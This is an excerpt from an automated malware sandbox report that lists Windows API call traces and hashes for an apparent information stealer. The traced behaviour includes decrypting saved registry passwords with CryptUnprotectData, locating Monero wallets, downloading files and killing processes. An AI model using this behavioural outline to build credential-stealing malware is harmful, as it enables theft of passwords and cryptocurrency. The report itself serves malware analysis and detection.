                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006DE126
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 4230089145-0
                                • Opcode ID: 5a7065e87215b08f70c3c6d5ce47a74cc08311f64c6c8f5a0a3c840b6de9dbe7
                                • Instruction ID: 3ba63e94ae1a78562eab53f0677b5b866d38f8b1af34f30c35bb59bdc1e4affd
                                • Opcode Fuzzy Hash: 5a7065e87215b08f70c3c6d5ce47a74cc08311f64c6c8f5a0a3c840b6de9dbe7
                                • Instruction Fuzzy Hash: DB612A7191011CABCB55EB64DC58BED77B6BF88300F1049A9EA49A7350DE709F85CF90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C6AFF
                                • InternetOpenA.WININET(006ECFEC,00000001,00000000,00000000,00000000), ref: 006C6B2C
                                • StrCmpCA.SHLWAPI(?,00F20BB8), ref: 006C6B4A
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 006C6B6A
                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006C6B88
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 006C6BA1
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 006C6BC6
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 006C6BF0
                                • CloseHandle.KERNEL32(00000000), ref: 006C6C10
                                • InternetCloseHandle.WININET(00000000), ref: 006C6C17
                                • InternetCloseHandle.WININET(?), ref: 006C6C21
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                • String ID:
                                • API String ID: 2500263513-0
                                • Opcode ID: 741f29b3f7734cd203f32dadfd774a372d680b28596a07dc600bdc1e42f8ed76
                                • Instruction ID: 8e3b211edb719d6e983501651b98d3bc4f70903be81a22d1d3e2f77ed5eef046
                                • Opcode Fuzzy Hash: 741f29b3f7734cd203f32dadfd774a372d680b28596a07dc600bdc1e42f8ed76
                                • Instruction Fuzzy Hash: 24415CB5A00205ABDB24DB64DC89FBE77B9FB44701F104558FA05E7280EF70AE41CBA8
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,006D4F39), ref: 006E4545
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E454C
                                • wsprintfW.USER32 ref: 006E455B
                                • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 006E45CA
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 006E45D9
                                • CloseHandle.KERNEL32(00000000,?,?), ref: 006E45E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                • String ID: 9Om$%hs$9Om
                                • API String ID: 885711575-4198278319
                                • Opcode ID: 58674aea9afab97efe1bf8131b2a1aa83a42b24fb1c5b8b0ba9aebf8e7517f87
                                • Instruction ID: 89f8d16e51faa120ac881866f26c61597c9799853046a17205e98ce0f2899b22
                                • Opcode Fuzzy Hash: 58674aea9afab97efe1bf8131b2a1aa83a42b24fb1c5b8b0ba9aebf8e7517f87
                                • Instruction Fuzzy Hash: B6311872A01209ABDB20DBB5DC49FEEB779FB84700F104159FA05A6180EF70AA41CBA5
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CBC1F
                                • lstrlen.KERNEL32(00000000), ref: 006CBC52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CBC7C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CBC84
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CBCAC
                                • lstrlen.KERNEL32(006F4AD4), ref: 006CBD23
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: b8e0b458fb38b249e73ced7b20a34d93ed8565f5a60afcbe381bb23313f85880
                                • Instruction ID: 0d8118021f0f9f4408ac2b101fad0d433459af284286a5316da1c244d821e9b9
                                • Opcode Fuzzy Hash: b8e0b458fb38b249e73ced7b20a34d93ed8565f5a60afcbe381bb23313f85880
                                • Instruction Fuzzy Hash: 06A13870A012068BCB65DB69D94AFBAB7B2FF44305F18906DE80ADB361DB35DC41CB94
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006E5F2A
                                • std::_Xinvalid_argument.LIBCPMT ref: 006E5F49
                                • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 006E6014
                                • memmove.MSVCRT(00000000,00000000,?), ref: 006E609F
                                • std::_Xinvalid_argument.LIBCPMT ref: 006E60D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 1975243496-4289949731
                                • Opcode ID: 54adcdd8b92fa7efe847d929210ecd5220548fbcf116f245b7d6f7b8d2a99275
                                • Instruction ID: 3be80e00bffd1bfb6ce2063abaf247f9faede05efb359d4af4bd29825e1513f2
                                • Opcode Fuzzy Hash: 54adcdd8b92fa7efe847d929210ecd5220548fbcf116f245b7d6f7b8d2a99275
                                • Instruction Fuzzy Hash: F961BD70712784DBDB28CF5EC98096EB3B7EF94308B244A49F4828B781D730AD818B95
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 006DE07D
                                • lstrcat.KERNEL32(?,?), ref: 006DE098
                                • lstrcat.KERNEL32(?,?), ref: 006DE0AC
                                • lstrcat.KERNEL32(?,00F0A6D8), ref: 006DE0C0
                                • lstrcat.KERNEL32(?,?), ref: 006DE0D4
                                • lstrcat.KERNEL32(?,00F1F4C0), ref: 006DE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006DE126
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFile
                                • String ID:
                                • API String ID: 3428472996-0
                                • Opcode ID: 1cfface50f85d898388a23cfc0cc808bac216ee9417f8105d8e67af787f7291f
                                • Instruction ID: 976d2c79e08215567e3b35e91607ec9dbd3dd0869a91c300b7c50335ce4c7397
                                • Opcode Fuzzy Hash: 1cfface50f85d898388a23cfc0cc808bac216ee9417f8105d8e67af787f7291f
                                • Instruction Fuzzy Hash: 37414771D10128ABCB65EBA4DC59BED73B6FF88300F1049A9F94A97351DF309E858B90
                                APIs
                                  • Part of subcall function 006C77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006C7805
                                  • Part of subcall function 006C77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 006C784A
                                  • Part of subcall function 006C77D0: StrStrA.SHLWAPI(?,Password), ref: 006C78B8
                                  • Part of subcall function 006C77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 006C78EC
                                  • Part of subcall function 006C77D0: HeapFree.KERNEL32(00000000), ref: 006C78F3
                                • lstrcat.KERNEL32(00000000,006F4AD4), ref: 006C7A90
                                • lstrcat.KERNEL32(00000000,?), ref: 006C7ABD
                                • lstrcat.KERNEL32(00000000, : ), ref: 006C7ACF
                                • lstrcat.KERNEL32(00000000,?), ref: 006C7AF0
                                • wsprintfA.USER32 ref: 006C7B10
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C7B39
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C7B47
                                • lstrcat.KERNEL32(00000000,006F4AD4), ref: 006C7B60
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                • String ID: :
                                • API String ID: 398153587-3653984579
                                • Opcode ID: db30b32a72e4f86cb3b29ea877a115023e5fb3dfdbc9aca62feca789c0b95ba3
                                • Instruction ID: 272d32e5298bdfcc32e4ce20765d90dce33c9d18f7666416ca57dc5ad2e4f6d7
                                • Opcode Fuzzy Hash: db30b32a72e4f86cb3b29ea877a115023e5fb3dfdbc9aca62feca789c0b95ba3
                                • Instruction Fuzzy Hash: 18314C72A14618EFCB10DFA8DC48EBAB77AFB84710B15451DE94A93310DF70AD41CBA0
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006D820C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D8243
                                • lstrlen.KERNEL32(00000000), ref: 006D8260
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D8297
                                • lstrlen.KERNEL32(00000000), ref: 006D82B4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D82EB
                                • lstrlen.KERNEL32(00000000), ref: 006D8308
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D8337
                                • lstrlen.KERNEL32(00000000), ref: 006D8351
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D8380
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: e2158c25f5c403be0d119ae286f8e242bab38f9e553e44790495d721684d1acc
                                • Instruction ID: ef3b51ee6a8332c5709b8cbd614834b40da6e35974d0c2bba441daee19d79bcb
                                • Opcode Fuzzy Hash: e2158c25f5c403be0d119ae286f8e242bab38f9e553e44790495d721684d1acc
                                • Instruction Fuzzy Hash: F4514B759016129FDB14EFB9D858BAAB7AAFF44700F124529AD0ADB344DF30E950CBE0
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006C7805
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 006C784A
                                • StrStrA.SHLWAPI(?,Password), ref: 006C78B8
                                  • Part of subcall function 006C7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 006C775E
                                  • Part of subcall function 006C7750: RtlAllocateHeap.NTDLL(00000000), ref: 006C7765
                                  • Part of subcall function 006C7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006C778D
                                  • Part of subcall function 006C7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 006C77AD
                                  • Part of subcall function 006C7750: LocalFree.KERNEL32(?), ref: 006C77B7
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006C78EC
                                • HeapFree.KERNEL32(00000000), ref: 006C78F3
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 006C7A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                • String ID: Password
                                • API String ID: 356768136-3434357891
                                • Opcode ID: fe7f1dda44dc1758745a5194dcff31558907afc03d63a272d1ff4340444a5a2b
                                • Instruction ID: a5feb405a7b9083d227705c20c0580bdeb4a664a41cb142a39ee09ead60060ba
                                • Opcode Fuzzy Hash: fe7f1dda44dc1758745a5194dcff31558907afc03d63a272d1ff4340444a5a2b
                                • Instruction Fuzzy Hash: 5C711DB1D0021D9FDB50DF95DC81EEEBBB9EF49300F1045AAE609A7240EA315A85CFA5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C1135
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C113C
                                • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 006C1159
                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 006C1173
                                • RegCloseKey.ADVAPI32(?), ref: 006C117D
                                Strings
                                • SOFTWARE\monero-project\monero-core, xrefs: 006C114F
                                • wallet_path, xrefs: 006C116D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                • API String ID: 3225020163-4244082812
                                • Opcode ID: a8bc5cfd7654f858fb151c46ce307e50c853c0052077235c072d7c8044d2a051
                                • Instruction ID: c21077c1376ff51bf40720c10a1e2419abda74f63345fa6ed97638ffba2aedc8
                                • Opcode Fuzzy Hash: a8bc5cfd7654f858fb151c46ce307e50c853c0052077235c072d7c8044d2a051
                                • Instruction Fuzzy Hash: C2F01D75640208FFD7109BB59C4DFFA7B6CEB45755F100155FF09E6280EAB05A44C7A0
                                APIs
                                • memcmp.MSVCRT(?,v20,00000003), ref: 006C9E04
                                • memcmp.MSVCRT(?,v10,00000003), ref: 006C9E42
